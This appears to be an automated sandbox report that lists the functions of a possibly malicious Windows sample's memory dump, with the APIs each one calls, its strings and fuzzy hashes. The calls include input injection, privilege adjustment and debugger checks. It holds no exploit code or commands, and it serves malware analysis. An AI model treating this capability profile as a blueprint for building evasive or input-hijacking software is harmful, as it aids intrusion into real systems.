Instruction ID: 3c41e477abd536ce51dc8062f27d8c5b2fc6508d435c9a4364259f16ff76dc7f
Opcode Fuzzy Hash: ffa6c81657eec7b84e05235db7532da9acf232aae951cf49852d270dfd57a1fa
Instruction Fuzzy Hash: F1C25A71E282298FDF64CE289D447EAB7F5EB58304F1541EAD81DE7280E774AE918F40

Function 0025648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 002564DC
CoInitialize.OLE32(00000000), ref: 00256639
CoCreateInstance.OLE32(0027FCF8,00000000,00000001,0027FB68,?), ref: 00256650
CoUninitialize.OLE32 ref: 002568D4

Strings

.lnk, xrefs: 002564BA, 00256524, 002565E0

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: c584f0c1aef53b684964a9965099f7dbc87e9167c9db6ee0c287006f4f16b2b6
Instruction ID: 34373bfd2d65f6e0ddb67cbfeb63ec3883a382baf5bc6c6c126cf95d782e0e79
Opcode Fuzzy Hash: c584f0c1aef53b684964a9965099f7dbc87e9167c9db6ee0c287006f4f16b2b6
Instruction Fuzzy Hash: 23D179715186419FD310EF24C885D6BB7E8FFA9304F50496DF4958B2A1EB30EE09CB92

Function 002622DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 002622E8

Part of subcall function 0025E4EC: GetWindowRect.USER32(?,?), ref: 0025E504

GetDesktopWindow.USER32 ref: 00262312
GetWindowRect.USER32(00000000), ref: 00262319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00262355
GetCursorPos.USER32(?), ref: 00262381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002623DF

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 037f9b08e03d3d1ddb2f0f5505404a7dcb96a586f08c8c70ec321fecff579d86
Instruction ID: ed68fbbbb96e9dc5e7dd5175369f07b1c64d55c43b192948f1b59e7d6f982f19
Opcode Fuzzy Hash: 037f9b08e03d3d1ddb2f0f5505404a7dcb96a586f08c8c70ec321fecff579d86
Instruction Fuzzy Hash: 7A3105725057159FDB20DF24D849F5BBBA9FF84310F10091DF98897281DB34EA68CB92

Function 00259B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00259B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00259C8B

Part of subcall function 00253874: GetInputState.USER32 ref: 002538CB
Part of subcall function 00253874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00253966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00259BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00259C75

Strings

*.*, xrefs: 00259B5D

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 07f1d8008a76929f1f36bf88ec61faf338666d769f55a07c2325c4120ca4e000
Instruction ID: 094276c392b0a3a2a113dc403fb01836e0f6c2ddbb719b2cda9cea433754ec5b
Opcode Fuzzy Hash: 07f1d8008a76929f1f36bf88ec61faf338666d769f55a07c2325c4120ca4e000
Instruction Fuzzy Hash: E641747191060ADFDF14DF64D849AEE7BB8EF19312F244056E805A3191DB309E98CF64

Function 001F997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 001F9A4E
GetSysColor.USER32(0000000F), ref: 001F9B23
SetBkColor.GDI32(?,00000000), ref: 001F9B36

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 9d67ba52670f5fb687bf36021d9f9e5a2b94b7e78ccd6309d9413a52713ca92a
Instruction ID: 9d0e8e2d7a353ccb7bbc946192a7eb8cb8267a780b2e8db38351b346a050099d
Opcode Fuzzy Hash: 9d67ba52670f5fb687bf36021d9f9e5a2b94b7e78ccd6309d9413a52713ca92a
Instruction Fuzzy Hash: 45A12AF0128549BFEB38BE3C9C69F7B269DEB82340F15420AF612C7591CB259D61C671

Function 00261806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0026304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0026307A
Part of subcall function 0026304E: _wcslen.LIBCMT ref: 0026309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0026185D
WSAGetLastError.WSOCK32 ref: 00261884
bind.WSOCK32(00000000,?,00000010), ref: 002618DB
WSAGetLastError.WSOCK32 ref: 002618E6
closesocket.WSOCK32(00000000), ref: 00261915

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 651f180cfc58e5a9817a1a905a8d77dcd24dbff0be5b5f46ba023b7cfd55028d
Instruction ID: cc9834f15fe0a1ce9d5ec42b98f82ec7fad4072b42e8ae8903f908fdd4074ed5
Opcode Fuzzy Hash: 651f180cfc58e5a9817a1a905a8d77dcd24dbff0be5b5f46ba023b7cfd55028d
Instruction Fuzzy Hash: 0251B471A006009FE710AF24D88AF2A77E5AF54718F58845CF91A9F3D3C771AD928BA1

Function 00271C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00271CC0
IsWindowEnabled.USER32 ref: 00271CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00271CDB
IsIconic.USER32 ref: 00271CE9
IsZoomed.USER32 ref: 00271CF7

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 95948d43267f2f8838a25d128200292f2dd91e350036735f6cffb981d41e7c85
Instruction ID: 9db16ae977d9d2c9181dd0b041b1ddf1e0131a0cfc6e915c3f2f8dfaeb55dc05
Opcode Fuzzy Hash: 95948d43267f2f8838a25d128200292f2dd91e350036735f6cffb981d41e7c85
Instruction Fuzzy Hash: AE21D3317502119FD7218F6ED888B2A7BA5EF95314F19C05DE84E8B351CB71DC62CB91

Function 001E8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00225DF0
VUUU, xrefs: 001E843C
VUUU, xrefs: 001E83E8
VUUU, xrefs: 001E83FA
ERCP, xrefs: 001E813C

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 8e58050cae8db5572de59b6fa19d3957ccbf0aca244c47facc75fd9d206e2764
Instruction ID: 028a3ed68722c958dcf2b8e2eee953ef6c311c3f98e98a0493ffd13ed66f0f70
Opcode Fuzzy Hash: 8e58050cae8db5572de59b6fa19d3957ccbf0aca244c47facc75fd9d206e2764
Instruction Fuzzy Hash: 26A2E371E10A6ADBDF24CF99D8447ADB3B1FF54310F2581AAE819A7284EB309D91CF50

Function 00248298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 002482AA

Strings

tb*, xrefs: 002484F4
(, xrefs: 002482F0
|, xrefs: 002482DA

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: lstrlen
String ID: ($tb*$|
API String ID: 1659193697-4261382565
Opcode ID: 305991d124b5dede757e0f76926cc3282733a16842e824f5e21e3d95ee92f059
Instruction ID: f4e3ae4460a2c79c2ef8c2e352a655aa32caeaf740ddc38c7a082229ce636bb4
Opcode Fuzzy Hash: 305991d124b5dede757e0f76926cc3282733a16842e824f5e21e3d95ee92f059
Instruction Fuzzy Hash: 76323875A20606DFC728CF19C480A6AB7F0FF48710B15C56EE59ADB3A1EB70E991CB40

Function 0026A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0026A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0026A6BA

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0026A79C
CloseHandle.KERNEL32(00000000), ref: 0026A7AB

Part of subcall function 001FCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00223303,?), ref: 001FCE8A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: bd5a9bc519283d7e5140ad1e66b5817f6fff99cb999b64a0d054f6ca9fad1681
Instruction ID: 651879bf56cf03d3fdf0a25849e340062bb8b2bcc77f0ee7d9728ed07d6903aa
Opcode Fuzzy Hash: bd5a9bc519283d7e5140ad1e66b5817f6fff99cb999b64a0d054f6ca9fad1681
Instruction Fuzzy Hash: E0517A71508740AFD310EF25D886A6FBBE8FF99744F40492DF589972A2EB30D944CB92

Function 0024AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0024AAAC
SetKeyboardState.USER32(00000080), ref: 0024AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0024AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0024AB88

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 00ec61882b5a5daffed99fa8f4ce3b084c4222fed7259b3b1c8d880534dd4232
Instruction ID: ba6b275a216537693cfaab1e7cc3f56d760c817d4bfefda7112f3a8a02a28ede
Opcode Fuzzy Hash: 00ec61882b5a5daffed99fa8f4ce3b084c4222fed7259b3b1c8d880534dd4232
Instruction Fuzzy Hash: 65313D30AE0209AEFF3DCF64CC05BFA77A6EB64314F14421AF585561D0D3B589A1C752

Function 0025CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0025CE89
GetLastError.KERNEL32(?,00000000), ref: 0025CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0025CEFE

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 6ceec00b144e71c3d9675e5e497b5ebe1e30bc22aa5bbfa89143924e3310b3e5
Instruction ID: a9c4625f8d733bf2c5314e915d81a87604c59ce6f93fbb2c910324eea678d998
Opcode Fuzzy Hash: 6ceec00b144e71c3d9675e5e497b5ebe1e30bc22aa5bbfa89143924e3310b3e5
Instruction Fuzzy Hash: D821F1B15103069FDB20CF65D949BA777FCEB10315F20441EE946E2151E770ED58CB58

Function 00255C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00255CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00255D17
FindClose.KERNEL32(?), ref: 00255D5F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 5f857671743d14fbf9cdab75c396cbeb66fab528a273e56296773b7e2843be02
Instruction ID: af10e72a3b1d324ba63c778d6a4c435339c40f01d7f6c41e76e8beabccbcebc1
Opcode Fuzzy Hash: 5f857671743d14fbf9cdab75c396cbeb66fab528a273e56296773b7e2843be02
Instruction Fuzzy Hash: C2518A35614A029FC714CF28C4A4A9AB7F4FF49324F14855EE95A8B3A2CB30ED59CF91

Function 00212622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0021271A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00212724
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00212731

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2bb1f8668870df62cf5b9c6df51976fcbb6d44a0dc06ee3e110a1ef98e0f9362
Instruction ID: a8298fee9d1ce68c6f00dd94779f338f9361b9b83385f36bf7f981d75a44e03f
Opcode Fuzzy Hash: 2bb1f8668870df62cf5b9c6df51976fcbb6d44a0dc06ee3e110a1ef98e0f9362
Instruction Fuzzy Hash: 2E31D5749113289BCB21DF68DC887DDB7B8AF18310F5041EAE80CA72A1EB309F958F45

Function 002551CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002551DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00255238
SetErrorMode.KERNEL32(00000000), ref: 002552A1

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: a7c61dc76481fb97ecaa7dd7ea304a69d805914ebcee41de1b5853cfccfef574
Instruction ID: da70eaa79402d0adfb72432ab76573e160a93110662492b4694a348d67ff13c9
Opcode Fuzzy Hash: a7c61dc76481fb97ecaa7dd7ea304a69d805914ebcee41de1b5853cfccfef574
Instruction Fuzzy Hash: F6314F75A10518DFDB00DF54D898EADBBB4FF49314F148099E8099B362DB31E856CB90

Function 002416C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 001FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00200668
Part of subcall function 001FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00200685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0024170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0024173A
GetLastError.KERNEL32 ref: 0024174A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 4a255b0350a20feb9a85e6d4f3efd2c2f7f9bd09bef54fdb5c447a48b5cd531e
Instruction ID: a932103579dca727ad905edc04bf862e17b0f0a3cb95a3f4daf772a2242caef7
Opcode Fuzzy Hash: 4a255b0350a20feb9a85e6d4f3efd2c2f7f9bd09bef54fdb5c447a48b5cd531e
Instruction Fuzzy Hash: E911C1B2414309AFD7189F64EC86E6AB7BDEF44714B20852EE05657241EBB0FC918A60

Function 0024D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0024D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0024D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0024D650

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: f776d3be963d7daedbc3774399305a32368b4b3bcebdf9d1eb668b2a76ffea73
Instruction ID: 61abf71a7a905ff8a439f419700deb4dc68bc80e41ba39f68664cc0625a068f9
Opcode Fuzzy Hash: f776d3be963d7daedbc3774399305a32368b4b3bcebdf9d1eb668b2a76ffea73
Instruction Fuzzy Hash: 9B116575E05228BFDB148FA9EC49FAFBFBCEB45B50F104165F908E7290D6704A058BA1

Function 00241663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0024168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002416A1
FreeSid.ADVAPI32(?), ref: 002416B1

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 2f5839f780ea1ab41441d27d03dbab856b5ac95ad1163f0b45c5d6cb79c463ba
Instruction ID: acbde2468cb4ce9f577f7d0043cd45e869c855a2f16fae6196cd6285a9102eb5
Opcode Fuzzy Hash: 2f5839f780ea1ab41441d27d03dbab856b5ac95ad1163f0b45c5d6cb79c463ba
Instruction Fuzzy Hash: CBF0F471950319FBDB00DFF4AC89EAEBBBCFB08604F504565E501E2181E774AA848BA0

Function 00204CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,00204CBE,00000003,002A88B8,0000000C,00204E15,00000003,00000002,00000000,?,002128E9,00000003), ref: 00204D09
TerminateProcess.KERNEL32(00000000,?,00204CBE,00000003,002A88B8,0000000C,00204E15,00000003,00000002,00000000,?,002128E9,00000003), ref: 00204D10
ExitProcess.KERNEL32 ref: 00204D22

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
